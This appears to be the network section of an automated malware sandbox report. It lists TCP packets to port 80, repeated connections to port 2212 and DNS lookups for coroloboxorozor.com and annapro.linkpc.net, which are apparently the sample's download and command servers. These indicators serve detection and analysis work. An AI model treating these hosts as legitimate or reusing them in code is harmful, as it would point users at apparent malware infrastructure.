Feb 23, 2021 15:31:26.437510967 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437530041 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437546968 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.437550068 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437571049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437599897 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437622070 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437622070 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.437644005 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437666893 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437689066 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437700033 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.437705040 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.437707901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437725067 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437741041 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437786102 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.437798977 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.437841892 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.438146114 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438188076 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438213110 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438235044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438257933 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438265085 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.438281059 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438290119 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.438304901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438333988 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438365936 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438379049 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.438385010 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.438391924 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438420057 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438446045 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438468933 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438492060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438497066 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.438499928 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.438515902 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.438940048 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.439063072 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439094067 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439116955 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439137936 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439160109 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439166069 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.439171076 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.439182997 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439204931 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439224958 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439246893 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439254999 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.439259052 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.439270973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439294100 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439315081 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439335108 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439352989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439363956 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.439367056 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.439379930 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439423084 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.439426899 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.439964056 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.439985991 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440006971 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440023899 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440037966 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.440040112 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440056086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440072060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440088034 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440104008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440119982 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440125942 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.440129995 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.440138102 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440155029 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440171003 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440186024 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440201998 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440212011 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.440217018 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.440577984 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.440876007 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440897942 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440916061 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440936089 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440954924 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440972090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.440982103 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.440987110 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.440988064 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441004038 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.441004992 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441020966 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441036940 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441051960 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441061020 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.441065073 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.441071033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441088915 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441103935 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441117048 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.441119909 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.441119909 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441216946 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.441823959 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441847086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441864014 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441879034 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441895008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441910982 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441931009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441942930 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.441947937 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441952944 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.441956043 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.441963911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441981077 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.441998005 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442013979 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442022085 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442028046 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442028999 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442044973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442065001 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442078114 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442148924 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442724943 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442747116 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442763090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442780972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442806959 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442810059 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442816019 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442826986 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442845106 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442862034 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442877054 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442893028 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442897081 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442902088 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442908049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442928076 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442945957 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442946911 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442950964 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.442960978 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.442976952 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443105936 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.443115950 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.443665028 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443687916 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443707943 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443727016 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443742990 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443758965 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443774939 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443774939 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.443790913 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443804979 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.443846941 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.443854094 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.453294992 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.456984997 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.553798914 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.607259035 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655714989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655742884 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655764103 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655781984 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655797958 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655814886 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655832052 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655842066 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.655848026 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655864000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655879974 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655900955 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655919075 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655922890 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.655929089 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.655934095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655950069 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655966043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.655981064 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.656037092 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.656040907 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.656436920 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.656457901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.656476021 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.656490088 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.656505108 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.656717062 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.656725883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.657166004 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:28.483263016 CET	49754	2212	192.168.2.4	185.157.160.233
Feb 23, 2021 15:31:38.701963902 CET	49762	2212	192.168.2.4	185.157.160.233
Feb 23, 2021 15:31:41.781236887 CET	49762	2212	192.168.2.4	185.157.160.233
Feb 23, 2021 15:31:47.797405958 CET	49762	2212	192.168.2.4	185.157.160.233
Feb 23, 2021 15:31:56.042220116 CET	49773	2212	192.168.2.4	185.157.160.233
Feb 23, 2021 15:31:59.048412085 CET	49773	2212	192.168.2.4	185.157.160.233
Feb 23, 2021 15:32:05.049350977 CET	49773	2212	192.168.2.4	185.157.160.233
Feb 23, 2021 15:32:13.941417933 CET	49778	2212	192.168.2.4	105.112.108.188
Feb 23, 2021 15:32:15.896755934 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:32:15.952955008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:32:15.953116894 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:32:16.956087112 CET	49778	2212	192.168.2.4	105.112.108.188
Feb 23, 2021 15:32:22.956593990 CET	49778	2212	192.168.2.4	105.112.108.188
Feb 23, 2021 15:32:32.184233904 CET	49780	2212	192.168.2.4	105.112.108.188
Feb 23, 2021 15:32:35.192018986 CET	49780	2212	192.168.2.4	105.112.108.188
Feb 23, 2021 15:32:41.286236048 CET	49780	2212	192.168.2.4	105.112.108.188
Feb 23, 2021 15:32:54.819349051 CET	49783	2212	192.168.2.4	105.112.108.188
Feb 23, 2021 15:32:57.818834066 CET	49783	2212	192.168.2.4	105.112.108.188
Feb 23, 2021 15:33:00.717015982 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:33:01.955121040 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:33:03.819534063 CET	49783	2212	192.168.2.4	105.112.108.188

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 15:30:20.680283070 CET	53	53097	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:20.707504034 CET	53	49257	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:21.708828926 CET	62389	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:30:21.760624886 CET	53	62389	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:22.713382006 CET	49910	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:30:22.762236118 CET	53	49910	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:24.709842920 CET	55854	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:30:24.761312008 CET	53	55854	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:25.914011002 CET	64549	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:30:25.965576887 CET	53	64549	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:26.455765963 CET	63153	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:30:26.515569925 CET	53	63153	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:26.924083948 CET	52991	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:30:26.972707033 CET	53	52991	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:30.113866091 CET	53700	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:30:30.165400982 CET	53	53700	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:32.199830055 CET	51726	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:30:32.261009932 CET	53	51726	8.8.8.8	192.168.2.4
Feb 23, 2021 15:30:56.331124067 CET	56794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:30:56.379892111 CET	53	56794	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:02.126842022 CET	56534	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:02.175426960 CET	53	56534	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:03.642854929 CET	56627	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:03.703458071 CET	53	56627	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:04.659954071 CET	56621	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:04.711618900 CET	53	56621	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:05.693697929 CET	63116	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:05.742446899 CET	53	63116	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:06.682868004 CET	64078	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:06.736475945 CET	53	64078	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:07.520349979 CET	64801	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:07.571640968 CET	53	64801	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:08.329119921 CET	61721	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:08.379194021 CET	53	61721	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:09.234857082 CET	51255	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:09.286412954 CET	53	51255	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:10.147738934 CET	61522	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:10.199393988 CET	53	61522	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:11.123691082 CET	52337	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:11.176460981 CET	53	52337	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:11.926641941 CET	55046	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:11.975496054 CET	53	55046	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:12.812582970 CET	49612	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:12.836890936 CET	49285	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:12.872358084 CET	53	49612	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:12.885586977 CET	53	49285	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:16.486622095 CET	50601	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:16.535398006 CET	53	50601	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:25.388812065 CET	60875	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:25.449579954 CET	53	60875	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:31.998435974 CET	56448	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:32.047103882 CET	53	56448	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:32.920140982 CET	59172	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:32.969357967 CET	53	59172	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:33.350863934 CET	62420	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:33.427072048 CET	53	62420	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:34.327445030 CET	60579	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:34.384294033 CET	53	60579	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:35.341973066 CET	50183	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:35.401608944 CET	53	50183	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:37.125811100 CET	61531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:37.184396982 CET	53	61531	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:39.242160082 CET	49228	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:39.301271915 CET	53	49228	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:40.609515905 CET	59794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:40.687084913 CET	53	59794	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:42.351783037 CET	55916	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:42.381242990 CET	52752	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:42.411096096 CET	53	55916	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:42.442661047 CET	53	52752	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:45.060158014 CET	60542	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:45.135049105 CET	53	60542	8.8.8.8	192.168.2.4
Feb 23, 2021 15:31:47.073991060 CET	60689	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:31:47.131155968 CET	53	60689	8.8.8.8	192.168.2.4
Feb 23, 2021 15:32:10.154611111 CET	64206	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:32:10.206274986 CET	53	64206	8.8.8.8	192.168.2.4
Feb 23, 2021 15:32:10.401216030 CET	50904	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:32:10.450656891 CET	53	50904	8.8.8.8	192.168.2.4
Feb 23, 2021 15:32:13.777793884 CET	57525	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:32:13.938626051 CET	53	57525	8.8.8.8	192.168.2.4
Feb 23, 2021 15:32:16.357415915 CET	53814	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:32:16.417882919 CET	53	53814	8.8.8.8	192.168.2.4
Feb 23, 2021 15:32:32.021570921 CET	53418	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:32:32.182097912 CET	53	53418	8.8.8.8	192.168.2.4
Feb 23, 2021 15:32:42.793909073 CET	62833	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:32:42.845534086 CET	53	62833	8.8.8.8	192.168.2.4
Feb 23, 2021 15:32:43.816461086 CET	59260	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:32:43.865185022 CET	53	59260	8.8.8.8	192.168.2.4
Feb 23, 2021 15:32:54.760787964 CET	49944	53	192.168.2.4	8.8.8.8
Feb 23, 2021 15:32:54.818011999 CET	53	49944	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 15:30:32.199830055 CET	192.168.2.4	8.8.8.8	0xe194	Standard query (0)	coroloboxorozor.com	A (IP address)	IN (0x0001)
Feb 23, 2021 15:31:12.812582970 CET	192.168.2.4	8.8.8.8	0x929	Standard query (0)	coroloboxorozor.com	A (IP address)	IN (0x0001)
Feb 23, 2021 15:31:25.388812065 CET	192.168.2.4	8.8.8.8	0x82db	Standard query (0)	coroloboxorozor.com	A (IP address)	IN (0x0001)
Feb 23, 2021 15:32:13.777793884 CET	192.168.2.4	8.8.8.8	0x8004	Standard query (0)	annapro.linkpc.net	A (IP address)	IN (0x0001)
Feb 23, 2021 15:32:32.021570921 CET	192.168.2.4	8.8.8.8	0xf8a1	Standard query (0)	annapro.linkpc.net	A (IP address)	IN (0x0001)
Feb 23, 2021 15:32:54.760787964 CET	192.168.2.4	8.8.8.8	0xdde6	Standard query (0)	annapro.linkpc.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 23, 2021 15:30:32.261009932 CET	8.8.8.8	192.168.2.4	0xe194	No error (0)	coroloboxorozor.com	172.67.172.17	A (IP address)	IN (0x0001)
Feb 23, 2021 15:30:32.261009932 CET	8.8.8.8	192.168.2.4	0xe194	No error (0)	coroloboxorozor.com	104.21.71.230	A (IP address)	IN (0x0001)
Feb 23, 2021 15:31:12.872358084 CET	8.8.8.8	192.168.2.4	0x929	No error (0)	coroloboxorozor.com	104.21.71.230	A (IP address)	IN (0x0001)
Feb 23, 2021 15:31:12.872358084 CET	8.8.8.8	192.168.2.4	0x929	No error (0)	coroloboxorozor.com	172.67.172.17	A (IP address)	IN (0x0001)
Feb 23, 2021 15:31:25.449579954 CET	8.8.8.8	192.168.2.4	0x82db	No error (0)	coroloboxorozor.com	172.67.172.17	A (IP address)	IN (0x0001)
Feb 23, 2021 15:31:25.449579954 CET	8.8.8.8	192.168.2.4	0x82db	No error (0)	coroloboxorozor.com	104.21.71.230	A (IP address)	IN (0x0001)
Feb 23, 2021 15:32:13.938626051 CET	8.8.8.8	192.168.2.4	0x8004	No error (0)	annapro.linkpc.net	105.112.108.188	A (IP address)	IN (0x0001)
Feb 23, 2021 15:32:32.182097912 CET	8.8.8.8	192.168.2.4	0xf8a1	No error (0)	annapro.linkpc.net	105.112.108.188	A (IP address)	IN (0x0001)
Feb 23, 2021 15:32:54.818011999 CET	8.8.8.8	192.168.2.4	0xdde6	No error (0)	annapro.linkpc.net	105.112.108.188	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

